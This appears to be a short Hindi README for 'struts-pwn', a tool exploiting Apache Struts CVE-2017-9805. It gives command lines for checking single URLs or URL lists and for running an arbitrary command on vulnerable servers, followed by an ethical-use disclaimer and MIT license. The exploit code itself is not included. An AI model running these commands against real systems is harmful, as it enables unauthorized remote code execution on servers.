
Apache Struts CVE-2017-9805 के लिए एक एक्सप्लॉइट
python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
python struts-pwn.py --list 'urls.txt'
python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'
python struts-pwn.py --exploit --list 'urls.txt' -c 'touch /tmp/struts-pwn'

यह परियोजना केवल शैक्षिक और नैतिक परीक्षण उद्देश्यों के लिए बनाई गई है। पूर्व आपसी सहमति के बिना लक्ष्यों पर हमला करने के लिए struts-pwn का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की जिम्मेदारी है। डेवलपर्स कोई देयता नहीं मानते हैं और इस प्रोग्राम के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
यह परियोजना MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है।
Mazin Ahmed